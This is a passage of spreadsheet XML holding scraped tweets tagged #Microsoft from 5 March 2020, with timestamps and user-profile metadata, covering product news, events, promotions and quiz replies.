#MSFTStudentPartner #inspire @MSPInspire #Microsoft https://t.co/fEBYz3K0FK</t>
  </si>
  <si>
    <t>Thu Mar 05 20:08:40 +0000 2020</t>
  </si>
  <si>
    <t>Guess who made it there to meet this amazing group of student partners. Jack Ngare Managing Director of the Microsoft Africa Development Center - #MicrosoftADC in Kenya.  #MSFTStudentPartner  @IamPablo @Microsoft @4Afrika #Microsoft https://t.co/bXNh1A7t2R</t>
  </si>
  <si>
    <t>Thu Mar 05 20:08:39 +0000 2020</t>
  </si>
  <si>
    <t>33 #Microsoft Student Partners from Across #Kenya convened under one room. One of the MSP travelled for over 12 hours to make it for today. Salute to you @nyarkolal this was an amazing day spent at the Africa development center
#MSFTStudentPartner  @IamPablo https://t.co/KhmKsDsBLk</t>
  </si>
  <si>
    <t>Thu Mar 05 20:08:38 +0000 2020</t>
  </si>
  <si>
    <t>I will give you a taste of how things, were today at #Microsoft Africa Development Center today with Engineers and Microsoft Student Partners. #MSFTStudentPartners @IamPablo https://t.co/htZ8xSPsQA</t>
  </si>
  <si>
    <t>Thu Mar 05 20:08:24 +0000 2020</t>
  </si>
  <si>
    <t>@Xbox your call-back contact system is broken. I have submitted a request 8+ times now for two different numbers with no response. You've have my loyal custom for 12+ years yet I can't seem to have a conversation with you about a problem with my account. Not impressed. #Microsoft</t>
  </si>
  <si>
    <t>{'id': 1231016466440429569, 'id_str': '1231016466440429569', 'name': 'Jake', 'screen_name': 'JQuiible', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 0, 'friends_count': 8, 'listed_count': 0, 'created_at': 'Sat Feb 22 00:43:13 +0000 2020', 'favourites_count': 1,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</si>
  <si>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20:06:57 +0000 2020</t>
  </si>
  <si>
    <t>So I've got the Sea of Thieves Xbox One controller. Is it worth me getting the controller Series 2 at all? It's a lot of money but I'm wondering if the price is worth the quality @Xbox #XboxOne #XboxSeriesX #Microsoft #XboxOne https://t.co/WJAG2nCUVJ</t>
  </si>
  <si>
    <t>{'id': 326166294, 'id_str': '326166294', 'name': 'Jamie Roberts', 'screen_name': 'DuneWhippet', 'location': 'Wales, United Kingdom', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 36, 'friends_count': 261, 'listed_count': 1, 'created_at': 'Wed Jun 29 13:51:08 +0000 2011', 'favourites_count': 2112, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 822,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'http://pbs.twimg.com/profile_images/1115752744516771841/yISeoBdL_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1115752744516771841/yISeoBdL_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/326166294/1554851213',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</si>
  <si>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20:03:34 +0000 2020</t>
  </si>
  <si>
    <t>"In our recent survey, we asked IT professionals if certifications helped them land a job, earn a promotion or get a pay raise, and which certifications theyre planning to pursue. Heres what we learned." #microsoft https://t.co/PQvanz1811 https://t.co/nfyvedc1PF</t>
  </si>
  <si>
    <t>Thu Mar 05 20:03:15 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Azure, Cisco team up to simplify IoT deployments https://t.co/8AGempVjtG #ZDNet #Microsoft</t>
  </si>
  <si>
    <t>Thu Mar 05 20:02:33 +0000 2020</t>
  </si>
  <si>
    <t>#AI #microsoft #cloud      In a recent survey, 27% of executives said they've already incorporated AI into key business processes. At Archon Security, we're ready to help you take the next step in your #AI journey. https://t.co/nDdWIcQLr5</t>
  </si>
  <si>
    <t>Thu Mar 05 20:02:20 +0000 2020</t>
  </si>
  <si>
    <t>Lyft is the latest tech company to send employees home over coronavirus https://t.co/Ux3i8LGUCu #Microsoft</t>
  </si>
  <si>
    <t>Thu Mar 05 20:00:39 +0000 2020</t>
  </si>
  <si>
    <t>Our web application called dataZen BSLTM powered by #Microsoft #Azure shows all the product related information on a finger touch.
"#Information about #products is as important as the products themselves."
#BigData #ECommerce #DataScience #DataAnalytics #SupplyChain #Iot https://t.co/HSVMYvZ5nY</t>
  </si>
  <si>
    <t>{'id': 110800782, 'id_str': '110800782', 'name': 'dataZen Engineering', 'screen_name': 'dataZenEng', 'location': 'Raleigh, NC, USA', 'description': 'We help Businesses grow by transforming DATA into meaningful and actionable INFORMATION. #BigData #DataScience #DataAnalytics #ArtificialIntelligence #eCommerce', 'url': 'http://t.co/RUuGKprvR4', 'entities': {'url': {'urls': [{'url': 'http://t.co/RUuGKprvR4', 'expanded_url': 'http://www.dataZenEngineering.com', 'display_url': 'dataZenEngineering.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1099, 'friends_count': 2554, 'listed_count': 20, 'created_at': 'Tue Feb 02 20:37:24 +0000 2010', 'favourites_count': 304, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1744,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'http://pbs.twimg.com/profile_images/894994373359915008/ezpDu2Ro_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/894994373359915008/ezpDu2Ro_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/110800782/1559139898', 'profile_link_color': '023825',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</si>
  <si>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Mar 05 20:00:25 +0000 2020</t>
  </si>
  <si>
    <t>Looking for good ways to ensure your #SharePoint &amp;amp; #office365 environment is suitably supported? Look no further - download our guide: https://t.co/dnZ2BjN50L 
#sharepointsupport #office365support #microsoftgoldpartner #microsoft https://t.co/n5FotC9eSH</t>
  </si>
  <si>
    <t>Thu Mar 05 20:00:19 +0000 2020</t>
  </si>
  <si>
    <t>How To: Make a Payment to a Vendor and Unapply Entry in Business Central
https://t.co/akCo891g8L
#microsoft #payments #howto #training</t>
  </si>
  <si>
    <t>{'id': 372314763, 'id_str': '372314763', 'name': 'WebSan Solutions Inc', 'screen_name': 'WebSanSolutions', 'location': 'Toronto, Canada', 'description': 'We are a Hosted (SaaS) Microsoft Dynamics Certified Partner and IT consulting and solutions provider.', 'url': 'http://t.co/dmog7NCvnU', 'entities': {'url': {'urls': [{'url': 'http://t.co/dmog7NCvnU', 'expanded_url': 'http://www.websan.com', 'display_url': 'websan.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 901, 'friends_count': 685, 'listed_count': 105, 'created_at': 'Mon Sep 12 15:05:11 +0000 2011', 'favourites_count': 114, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 5889,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'http://pbs.twimg.com/profile_images/895644889156857856/erEqdDLS_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/895644889156857856/erEqdDLS_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/372314763/1502373308', 'profile_link_color': '6AC9E6',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</si>
  <si>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19:59:20 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft, Google, Facebook, and others join forces with law enforcement on child abuse crackdown https://t.co/ptSmJzh0B4 #Microsoft</t>
  </si>
  <si>
    <t>Thu Mar 05 19:56:11 +0000 2020</t>
  </si>
  <si>
    <t>New Microsoft Security Nightmare: Users Warned Your Passwords Are Now At Risk https://t.co/duUQvNSM0r by @ukzak #microsoft</t>
  </si>
  <si>
    <t>{'id': 815973436933677056, 'id_str': '815973436933677056', 'name': 'ERPchum', 'screen_name': 'ERPchum', 'location': 'Waldorf, Deutschland', 'description': 'Watching, listening and learning from ERP disasters', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 160, 'friends_count': 416, 'listed_count': 5, 'created_at': 'Mon Jan 02 17:30:02 +0000 2017', 'favourites_count': 27, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1585, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/815979541730656257/CStqzn1L_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/815979541730656257/CStqzn1L_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/815973436933677056/1483379656',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</si>
  <si>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19:54:19 +0000 2020</t>
  </si>
  <si>
    <t>#ConsenSys And #EY Working On A New Project Supported By #Microsoft And #AMD - #BaselineProtocol #Cryptocurrency #DecentralisedFinance #ErnstAndYoung - https://t.co/efRsquzldF</t>
  </si>
  <si>
    <t>{'id': 126159663, 'id_str': '126159663', 'name': 'PaulCrypto.com', 'screen_name': 'PaulESamson', 'location': 'Bathurst, New Brunswick, Canada', 'description': '2020', 'url': 'https://t.co/LOLBhbUtQd', 'entities': {'url': {'urls': [{'url': 'https://t.co/LOLBhbUtQd', 'expanded_url': 'http://www.PaulCrypto.com', 'display_url': 'PaulCrypto.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 4449, 'friends_count': 4143, 'listed_count': 10, 'created_at': 'Thu Mar 25 00:55:52 +0000 2010', 'favourites_count': 887, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 57990,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'http://pbs.twimg.com/profile_images/907730917/_cid_200901021358_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/907730917/_cid_200901021358_normal.jpg', 'profile_link_color': '981CEB',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</si>
  <si>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Mar 05 19:53:11 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft's first product ever was a version of the programming language BASIC for the Altair 8800 "microcomputer," released in 1975  one of the earliest versions of what we now know as the personal computer or the PC. #throwbackthursday #Microsoft https://t.co/mDBGqrdKrx</t>
  </si>
  <si>
    <t>{'id': 1110096216, 'id_str': '1110096216', 'name': 'Betach Solutions', 'screen_name': 'BetachSolutions', 'location': 'Calgary &amp; Edmonton, AB, Canada', 'description': 'Providing IT consulting and management support and services, with a primary focus on Microsoft Online Cloud Productivity Solutions and customizations.', 'url': 'http://t.co/Fo4QJKupzJ', 'entities': {'url': {'urls': [{'url': 'http://t.co/Fo4QJKupzJ', 'expanded_url': 'http://www.betach.com', 'display_url': 'betach.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 134, 'friends_count': 252, 'listed_count': 6, 'created_at': 'Mon Jan 21 21:21:18 +0000 2013', 'favourites_count': 61, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 271, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'E7F5C7', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1110659869894279168/wK7Dxpdg_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1110659869894279168/wK7Dxpdg_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1110096216/1553636906', 'profile_link_color': '94BE3E',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</si>
  <si>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Thu Mar 05 19:52:11 +0000 2020</t>
  </si>
  <si>
    <t>We cater to YOUR Schedule  Learn Online at YOUR pace  Everything YOU need to become a CERTIFIED Train-The-Trainer is available at PrepMasters USA 24/7 - https://t.co/hHlcnus0xt #Microsoft https://t.co/KN3HxefiUX</t>
  </si>
  <si>
    <t>{'id': 23189841, 'id_str': '23189841', 'name': 'PrepMasters USA', 'screen_name': 'PrepMastersUSA', 'location': 'Irvine, California, USA', 'description': 'TRAINER TRAINING &amp; CERTIFICATION Online &amp; Classroom Preparing Master Trainers: #TraintheTrainer, #MCT Microsoft Approved Presentation Skills Provider, #CTTplus', 'url': 'http://t.co/weae45aVCo', 'entities': {'url': {'urls': [{'url': 'http://t.co/weae45aVCo', 'expanded_url': 'http://www.PrepMasters.com', 'display_url': 'PrepMasters.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 835, 'friends_count': 820, 'listed_count': 38, 'created_at': 'Sat Mar 07 12:55:47 +0000 2009', 'favourites_count': 9, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 6189,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'http://pbs.twimg.com/profile_images/733708372877303809/tDW0WaBs_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/733708372877303809/tDW0WaBs_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/23189841/1493318979', 'profile_link_color': '0084B9',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</si>
  <si>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19:49:19 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft, Google and others tell Seattle staff to work remotely amid coronavirus outbreak https://t.co/ixsTqi4o7T via @SiliconANGLE #coronavirus #Seattle #Microsoft #Google</t>
  </si>
  <si>
    <t>{'id': 1336231, 'id_str': '1336231', 'name': 'Robert Hof', 'screen_name': 'robhof', 'location': 'Palo Alto, California', 'description': 'I write about new stuff.', 'url': 'https://t.co/PzBnY9kRJP', 'entities': {'url': {'urls': [{'url': 'https://t.co/PzBnY9kRJP', 'expanded_url': 'http://siliconangle.com/blog/author/roberthof/', 'display_url': 'siliconangle.com/blog/author/roâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 11648, 'friends_count': 1579, 'listed_count': 664, 'created_at': 'Sat Mar 17 05:04:34 +0000 2007', 'favourites_count': 5183, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 23206, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '9BB1E9', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/28838992/hofdark_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/28838992/hofdark_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1336231/1356664981', 'profile_link_color': '0000FF', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': '91F1FF', 'profile_text_color': '000000', 'profile_use_background_image': True, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Mar 05 19:46:56 +0000 2020</t>
  </si>
  <si>
    <t>As part of my #Microsoft #PowerPlatform challenge, well take a look at the connectors &amp;amp; triggers in #PowerAutomate today. A workflow cannot be created without these, its therefore important to understand the role they play and which are available. https://t.co/bVqnM0NRLi</t>
  </si>
  <si>
    <t>{'id': 508736621, 'id_str': '508736621', 'name': 'Tracy v/d Schyff #NotLiz #MVP #Office365 #MSIgnite', 'screen_name': 'tracyvds', 'location': 'South Africa', 'description': 'My life Mission is to facilitate the evolution of human capabilities. #Microsoft #Adoption #Office365 #MSIgniteTheTour', 'url': 'https://t.co/92eeHKWGmk', 'entities': {'url': {'urls': [{'url': 'https://t.co/92eeHKWGmk', 'expanded_url': 'https://tracyvanderschyff.com', 'display_url': 'tracyvanderschyff.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 4553, 'friends_count': 2680, 'listed_count': 145, 'created_at': 'Wed Feb 29 11:19:31 +0000 2012', 'favourites_count': 8701, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 8574,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'http://pbs.twimg.com/profile_images/1231238782445400064/XVdjPVAn_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1231238782445400064/XVdjPVAn_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/508736621/1511724159',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</si>
  <si>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Thu Mar 05 19:46:48 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft provides annual update on its Airband Initiative #microsoft #airband https://t.co/PYAZdad5Hy https://t.co/atLLI6eknW</t>
  </si>
  <si>
    <t>Thu Mar 05 19:45:01 +0000 2020</t>
  </si>
  <si>
    <t>#PASS Marathon: #Performance Monitoring will take place on March 31, 2020. The Call for Speakers is now open! Submit your abstract before March 13. https://t.co/8Hnd7Eptud
#sqlPASS #database #development #bestpractices #troubleshooting #sqldba #microsoft #madeiradata https://t.co/wLsT6Fxyqy</t>
  </si>
  <si>
    <t>Thu Mar 05 19:44:11 +0000 2020</t>
  </si>
  <si>
    <t>Wow Guys! A HUGE thank you to our teachers, support staff and #sipers who have made a massive effort to follow our lessons online and continue their education journeys! We must include a shout out to #microsoft.  We are currently running more than 60 classes online! https://t.co/CePxBPSUoY</t>
  </si>
  <si>
    <t>{'id': 308958609, 'id_str': '308958609', 'name': 'SIP school', 'screen_name': 'sippavia', 'location': 'Italy', 'description': 'International School in Pavia', 'url': 'https://t.co/eKC7bcGESC', 'entities': {'url': {'urls': [{'url': 'https://t.co/eKC7bcGESC', 'expanded_url': 'http://www.scuolainternazionalepv.it', 'display_url': 'scuolainternazionalepv.it', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 16, 'friends_count': 24, 'listed_count': 0, 'created_at': 'Wed Jun 01 08:50:11 +0000 2011', 'favourites_count': 14, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 93, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': True, 'profile_background_color': '000000', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme18/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme18/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/967000258063536128/guCh5YGA_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/967000258063536128/guCh5YGA_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/308958609/1519386178',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</si>
  <si>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Thu Mar 05 19:43:52 +0000 2020</t>
  </si>
  <si>
    <t>HOW TO SEARCH AND INSTALL NEW FONTS IN WINDOWS 10 https://t.co/sszV7FXXcd via @YouTube #windows10 #microsoft #Youtube @Microsoft @Windows</t>
  </si>
  <si>
    <t>{'id': 704409350211837952, 'id_str': '704409350211837952', 'name': 'RA Solutions', 'screen_name': 'RA__Solutions', 'location': 'United Kingdom', 'description': 'Reviews, Tutorials, Tips and Tricks', 'url': 'https://t.co/6M4PK9uwHw', 'entities': {'url': {'urls': [{'url': 'https://t.co/6M4PK9uwHw', 'expanded_url': 'https://www.youtube.com/channel/UCJ7xNxs6TVQFz72tJy9chFQ?sub_confirmation=1', 'display_url': 'youtube.com/channel/UCJ7xNâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 87, 'friends_count': 229, 'listed_count': 1, 'created_at': 'Mon Feb 29 20:54:11 +0000 2016', 'favourites_count': 419, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 554,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'http://pbs.twimg.com/profile_images/704410029689061376/ZKGDt8z-_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/704410029689061376/ZKGDt8z-_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/704409350211837952/1457293803',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</si>
  <si>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19:40:11 +0000 2020</t>
  </si>
  <si>
    <t>@99_pvt A.9) C. Interface
#99jobs #quizcontest #ContestIndia #ITquiz  #contest #Microsoft
@Gurdeep0003 @surindersuri99 @ShilpiVarshne15 @shail2810 @satyapaljain_86 @Soniyaskjain1 @Sappy786</t>
  </si>
  <si>
    <t>{'id': 1193073750507319296, 'id_str': '1193073750507319296', 'name': 'Tanu Agarwal', 'screen_name': 'Tanu7069', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 40, 'friends_count': 161, 'listed_count': 0, 'created_at': 'Sat Nov 09 07:52:15 +0000 2019', 'favourites_count': 200, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 139, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1193074083367288832/yRr7rx62_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1193074083367288832/yRr7rx62_normal.jpg',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</si>
  <si>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19:39:22 +0000 2020</t>
  </si>
  <si>
    <t>@99_pvt A.11) B.  1000000000 bytes
#99jobs #quizcontest #ContestIndia #ITquiz  #contest #Microsoft
Join guys
@abha_mishra19 @ShilpiVarshne15 @Gurdeep0003 @surindersuri99 @shail2810 @Sappy786</t>
  </si>
  <si>
    <t>Thu Mar 05 19:38:33 +0000 2020</t>
  </si>
  <si>
    <t>@99_pvt A.13) C. ROM
#99jobs #quizcontest #ContestIndia #ITquiz  #contest #Microsoft
Join guys
@Soniyaskjain1 @Sappy786 @ShilpiVarshne15 @shail2810 @Gurdeep0003 @SanjayJ45449140 @satyapaljain_86</t>
  </si>
  <si>
    <t>Thu Mar 05 19:38:23 +0000 2020</t>
  </si>
  <si>
    <t>Women in Cloud co-founder and #Microsoft VP @GretchenOHara reveals how the global movement is making a sustainable change to gender parity in the technology industry and creating real access for women #entrepreneurs. 
@GlobalWIC @MicrosoftWomen #FemaleFounders #SheSoars #IWD2020 https://t.co/CA0dqGdiRC</t>
  </si>
  <si>
    <t>Thu Mar 05 19:37:39 +0000 2020</t>
  </si>
  <si>
    <t>@99_pvt A14) D) Washington
#99jobs #quizcontest #ContestIndia #ITquiz  #contest #Microsoft
Join @Sappy786 @Gurdeep0003 @satyapaljain_86 @ShilpiVarshne15 @shail2810 @VaishaliMaisur2 @Soniyaskjain1</t>
  </si>
  <si>
    <t>Thu Mar 05 19:37:20 +0000 2020</t>
  </si>
  <si>
    <t>@theo_verweij I interpret that post differently than you.  There are clear gaps in what #VisualBasic supports today.. there is clear indication that resources aren't being assigned (from #Microsoft).. but wouldn't it make sense to contribute first; failing that, build an alternative.</t>
  </si>
  <si>
    <t>{'id': 6429132, 'id_str': '6429132', 'name': 'Cory Smith', 'screen_name': 'DualBrain', 'location': 'North Richland Hills, TX', 'description': "'The only bug free software is dead software.' (#entrepreneur, #microsoft #visualbasic #dotnet, #radio #broadcasting, #motorcycle, #jkd #jeetkunedo)", 'url': 'https://t.co/ObvP1dAV4d', 'entities': {'url': {'urls': [{'url': 'https://t.co/ObvP1dAV4d', 'expanded_url': 'http://addressof.com', 'display_url': 'addressof.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 500, 'friends_count': 558, 'listed_count': 22, 'created_at': 'Wed May 30 01:16:48 +0000 2007', 'favourites_count': 393, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1110,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'http://pbs.twimg.com/profile_images/1136719927438729222/FcrurPjV_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1136719927438729222/FcrurPjV_normal.png', 'profile_link_color': '0000FF', 'profile_sidebar_border_color': '87BC44', 'profile_sidebar_fill_color': 'E0FF92', 'profile_text_color': '000000', 'profile_use_background_image': True, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Mar 05 19:36:36 +0000 2020</t>
  </si>
  <si>
    <t>Geeks guide to #Microsoft Teams Optimization with #Windows Virtual Desktop #Citrix #WVD https://t.co/qBepRDGr82</t>
  </si>
  <si>
    <t>{'id': 14515700, 'id_str': '14515700', 'name': 'George Kuruvilla', 'screen_name': 'gkuruvilla', 'location': 'Chicago, IL', 'description': 'Christ Follower, Family man, Solutions Strategist @Citrix Citrix Technology Advocate (CTA), Musician, Speaker, Blogger, Photographer, Student4Life', 'url': 'https://t.co/biOCq2AOb5', 'entities': {'url': {'urls': [{'url': 'https://t.co/biOCq2AOb5', 'expanded_url': 'https://www.linkedin.com/in/gkuruvilla/', 'display_url': 'linkedin.com/in/gkuruvilla/', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1790, 'friends_count': 161, 'listed_count': 96, 'created_at': 'Thu Apr 24 18:33:18 +0000 2008', 'favourites_count': 8449, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 15471,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'http://pbs.twimg.com/profile_images/1221107955958870016/9LKnOgG6_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1221107955958870016/9LKnOgG6_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/14515700/1573586513', 'profile_link_color': '1B95E0',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</si>
  <si>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19:34:18 +0000 2020</t>
  </si>
  <si>
    <t>Tenant-attach: bring your ConfigMngr devices to Microsoft Endpoint Manager #microsoft #devicemanagement #mem https://t.co/POKULduuaK</t>
  </si>
  <si>
    <t>{'id': 813526215768375297, 'id_str': '813526215768375297', 'name': 'Pablo Ortiz', 'screen_name': 'portiz2017', 'location': 'Madrid, EspaÃ±a', 'description': 'Enterprise Mobility + Security SME at @Microsoft, Music &amp; Arts lover, Dad', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 168, 'friends_count': 218, 'listed_count': 6, 'created_at': 'Mon Dec 26 23:25:39 +0000 2016', 'favourites_count': 501, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 638, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/973536617628622849/0_uaQtHY_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/973536617628622849/0_uaQtHY_normal.jpg',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</si>
  <si>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19:34:14 +0000 2020</t>
  </si>
  <si>
    <t>Uno Platform Behind the Scenes https://t.co/jqY2VlCUzy #Microsoft #Azure</t>
  </si>
  <si>
    <t>{'id': 885968274550337536, 'id_str': '885968274550337536', 'name': 'azure news', 'screen_name': 'azure1news', 'location': '', 'description': '', 'url': 'https://t.co/7XXautKxqB', 'entities': {'url': {'urls': [{'url': 'https://t.co/7XXautKxqB', 'expanded_url': 'https://azure1.io', 'display_url': 'azure1.io', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 67, 'friends_count': 3, 'listed_count': 3, 'created_at': 'Fri Jul 14 21:04:31 +0000 2017', 'favourites_count': 4, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 5074,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'http://pbs.twimg.com/profile_images/917759927799644160/iwNWhtyn_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/917759927799644160/iwNWhtyn_normal.jpg',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</si>
  <si>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19:34:12 +0000 2020</t>
  </si>
  <si>
    <t>Don't miss: Did We Just Attend the Last Trade Show Ever at RSA? https://t.co/A18JHYcFS6 #at&amp;amp;amp;t #breakingnews #facebook #google #ibm #mcafee #microsoft #op-ed #opencomputeproject(ocp) #opensource #security #topnews #verizon</t>
  </si>
  <si>
    <t>{'id': 384600885, 'id_str': '384600885', 'name': 'SDxCentral', 'screen_name': 'sdxcentral', 'location': 'Denver, CO', 'description': 'Building a network virtualization community for software-defined everything #SDN\n\nEditorial\n@Meyer_Dan\n@JessicaHrdcstle\n@mattkapko\n@Tobias_SDx\n@SkidKnee_Writes', 'url': 'https://t.co/lhJfV6ww1Z', 'entities': {'url': {'urls': [{'url': 'https://t.co/lhJfV6ww1Z', 'expanded_url': 'http://www.sdxcentral.com', 'display_url': 'sdxcentral.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 52029, 'friends_count': 3147, 'listed_count': 1404, 'created_at': 'Tue Oct 04 00:13:02 +0000 2011', 'favourites_count': 820, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 59586, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'FFAF3F', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme3/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme3/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1169727454644068352/aQESsLHG_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1169727454644068352/aQESsLHG_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/384600885/1567719734', 'profile_link_color': '1378B7', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': 'E3E2DE', 'profile_text_color': '634047', 'profile_use_background_image': False, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Mar 05 19:33:45 +0000 2020</t>
  </si>
  <si>
    <t>Join the Microsoft Data and AI South Florida @DataAISF and learn about Machine Learning Operations (MLOps) with Microsoft Azure by Eumar Assis from #Microsoft
RSVP and bring a friend. https://t.co/C4zCl1zB9U
#Azure #ml #azureml #powerbi #sqlfamily #machinelearning #ai #DevOps</t>
  </si>
  <si>
